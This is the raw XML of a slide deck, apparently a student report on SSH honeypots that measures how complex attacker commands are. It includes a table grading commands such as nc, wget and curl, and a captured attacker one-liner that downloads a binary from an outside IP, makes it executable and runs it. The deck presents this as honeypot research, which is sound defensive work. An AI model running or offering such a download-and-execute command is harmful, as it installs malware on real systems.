            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3199358" y="2277425"/>
              <a:ext cx="731104" cy="802191"/>
              <a:chOff x="2726483" y="1599818"/>
              <a:chExt cx="731104" cy="802191"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="71" name="Picture 7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161320B-CB87-45F5-AD9B-C1DAF35C4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9302" y="1599818"/>
                <a:ext cx="485480" cy="48548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02631CA-1E8A-4998-917D-275AD1BF3A75}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2726483" y="2060131"/>
                <a:ext cx="731104" cy="3418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MITM English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3AF2AC-52AE-4AA8-A22D-A810EC74D36E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4967881" y="2277425"/>
              <a:ext cx="754104" cy="820462"/>
              <a:chOff x="2715739" y="1599818"/>
              <a:chExt cx="754104" cy="820462"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="69" name="Picture 6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77E4A51-FB73-45B7-AD5E-A0F2097BF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9302" y="1599818"/>
                <a:ext cx="485480" cy="48548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312E2A-932E-41C3-A5C9-9C77DFCCE349}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2715739" y="2088906"/>
                <a:ext cx="754104" cy="331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MITM Russian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9B5D4FD-5A4A-4FF9-A3EE-1475EC23F6D4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6474490" y="2277425"/>
              <a:ext cx="754103" cy="788527"/>
              <a:chOff x="2714981" y="1599818"/>
              <a:chExt cx="754103" cy="788527"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="67" name="Picture 6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7F8A22E-4E39-488D-99A9-90259236C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9302" y="1599818"/>
                <a:ext cx="485480" cy="48548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47F2F7B-B0A5-4113-B161-9767031C7FC9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="2714981" y="2078403"/>
                <a:ext cx="754103" cy="3099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MITM Chinese</a:t>
                </a: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CBBF786-E372-4852-9D6F-712A0DB1DCE4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2013694" y="3189616"/>
              <a:ext cx="1266" cy="23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72D8E78-D74A-4303-8823-55DB9F61DC8E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64414" y="3197994"/>
              <a:ext cx="497" cy="211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DEF7323-B8FA-4D84-A78E-F861E1DF0CC2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5344178" y="3197072"/>
              <a:ext cx="8" cy="212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FF6128-D4FF-4C7F-9CA7-F7B31DCB62BF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6851543" y="3189616"/>
              <a:ext cx="2" cy="227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9824D42-37A1-41B9-9FB6-8E128BB1DA8A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3898186" y="900480"/>
              <a:ext cx="1060294" cy="814252"/>
              <a:chOff x="3898186" y="900480"/>
              <a:chExt cx="1060294" cy="814252"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="65" name="Picture 6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BCD3AFE-0639-4976-B8D8-372819B93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1979" y="900480"/>
                <a:ext cx="496718" cy="496716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E9CBA37-4754-45FC-BD35-939D5F3E5F3F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3898186" y="1411018"/>
                <a:ext cx="1060294" cy="30371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/>
                  <a:t>Public Internet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19CBEE1-28CA-4CCF-8F17-2AAA826EEB31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2002570" y="1714732"/>
              <a:ext cx="2425763" cy="53978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6160A6F-961F-4AB7-8105-4DFAD987AD47}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="66" idx="2"/>
              <a:endCxn id="71" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3564918" y="1714732"/>
              <a:ext cx="863415" cy="56269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24EF6F4-328C-4143-97A8-AD66D4B0B83E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4428334" y="1714732"/>
              <a:ext cx="953771" cy="53368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9D6699B-B8C3-4335-B723-BA5E6ABCEEB7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4428334" y="1714732"/>
              <a:ext cx="2423217" cy="56269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39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82806" y="1886121"/>
            <a:ext cx="3884120" cy="2661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/>
              <a:t>MITM Server will collect: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/>
              <a:t>IP address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/>
              <a:t>Login method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/>
              <a:t>Username + password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/>
              <a:t>Timestamps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/>
              <a:t>Commands run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Google Shape;79;p17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBBC1623-6AA2-9843-A8CF-2667FAB517F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6174605" y="1765556"/>
            <a:ext cx="2055855" cy="6864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sz="9600"/>
              <a:t>Backed up to Google Sheets</a:t>
            </a:r>
          </a:p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C3FF786-3A52-164A-9CE7-607D6B680D2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4264964" y="2242593"/>
            <a:ext cx="462732" cy="1948334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40CFFC-BDDF-B84F-B5ED-1C5598E8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98" y="2571750"/>
            <a:ext cx="1497068" cy="14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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4025239F-A6FB-43A8-BD4A-3FB7C0B4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32081"/>
            <a:ext cx="9141714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CEA4B-5A7A-4C44-AD42-BEE82956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34" y="234951"/>
            <a:ext cx="7338060" cy="1131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Command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5EAE-FD11-804D-8AB4-4223FECF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600" y="1930726"/>
            <a:ext cx="3606201" cy="2294873"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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Point assigned based on level</a:t>
            </a:r>
          </a:p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If none of the commands in an attack are in a level in the table then it is assigned level one</a:t>
            </a:r>
          </a:p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If in interactive mode +1 point however we had no interactive mode attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-182880">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-182880">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="274320" indent="-182880">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="15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0EA75A-2107-A040-9525-F8EFB3A1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9D5F76-8AD6-474E-A3CE-97B4EFFE7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92729"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4688292" y="2187229"/>
          <a:ext cx="404908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542">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="151765601"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2024542">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="904287816"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370633">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US"/>
                        <a:t>Level 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ls, cd, cat, grep, and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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uname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0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Level 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hive-passwd, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="18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pkill</a:t>
                      </a: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nc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Level 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scp</a:t>
                      </a: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wget</a:t>
                      </a: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, and curl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0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EA4B-5A7A-4C44-AD42-BEE82956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48" y="193993"/>
            <a:ext cx="7338060" cy="1131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Attack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5EAE-FD11-804D-8AB4-4223FECF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603" y="2442741"/>
            <a:ext cx="3741372" cy="1626853"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/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Start with the command complexity</a:t>
            </a:r>
          </a:p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Multiply by the factor according to the number of commands</a:t>
            </a:r>
          </a:p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44577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377190" indent="-285750"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0EA75A-2107-A040-9525-F8EFB3A1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EB40CD-3DCA-9C41-9F77-D093DD85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67741"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4910926" y="2201863"/>
          <a:ext cx="341835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175">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4126847080"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1709175">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="137696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Number of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Multiplying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&gt;=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&gt;=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4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Calculation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AF03B-FC0A-1A47-A6B5-9FEDC44B5D78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1267884" y="1618838"/>
            <a:ext cx="6860603" cy="78483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Noninteractive mode attacker command: cat /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etc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/issue; cd /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tmp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/; rm -rf x86*; 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wget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 http://179.43.175.58/x86_64; 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chmod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 777 *; ./x86_64 hive-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os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hager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; echo Hive-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Os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="150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Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hagerman</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="150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2" name="Google Shape;79;p17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6248C329-0C37-AC4D-B6F7-5BA25BD86481}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2795780" y="1499964"/>
            <a:ext cx="3552438" cy="6864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endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Google Shape;79;p17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13F666FD-D499-6942-8DCB-7F1E82E4314E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="640522" y="2541923"/>
            <a:ext cx="3560539" cy="21187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sz="1800"/>
              <a:t>Command Complexity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Highest level command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800"/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Level: 4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Noninteractive mode: no extra point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Score: 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;79;p17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D98B304-F56F-554C-B3BE-77CC967D97B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4567948" y="2579705"/>
            <a:ext cx="3560539" cy="21187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sz="1800"/>
              <a:t>Attack Complexity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Number of commands: 7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Multiplying factor: 1.2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4 * 1.2 = 4.8</a:t>
            </a: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/>
              <a:t>Score: 4.8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0246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481</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>124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Nova</vt:lpstr>
      <vt:lpstr>Cabrel</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Corbel</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Banded</vt:lpstr>
      <vt:lpstr>Final report</vt:lpstr>
      <vt:lpstr>Brief Overview </vt:lpstr>
      <vt:lpstr>Research Question</vt:lpstr>
      <vt:lpstr>Test Question</vt:lpstr>
      <vt:lpstr>Honeypot Design Changes</vt:lpstr>
      <vt:lpstr>Data Collection</vt:lpstr>
      <vt:lpstr>Command Complexity</vt:lpstr>
      <vt:lpstr>Attack Complexity</vt:lpstr>
      <vt:lpstr>Example Calculation</vt:lpstr>
      <vt:lpstr>Data Analysis </vt:lpstr>
      <vt:lpstr>Data Analysis </vt:lpstr>
      <vt:lpstr>Data Analysis </vt:lpstr>
      <vt:lpstr>Data Analysis </vt:lpstr>
      <vt:lpstr>Conclusions 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cp:lastModifiedBy>Makayla Janae George</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-12-30T19:49:10Z</dcterms:modified>
</cp:coreProperties>
</file>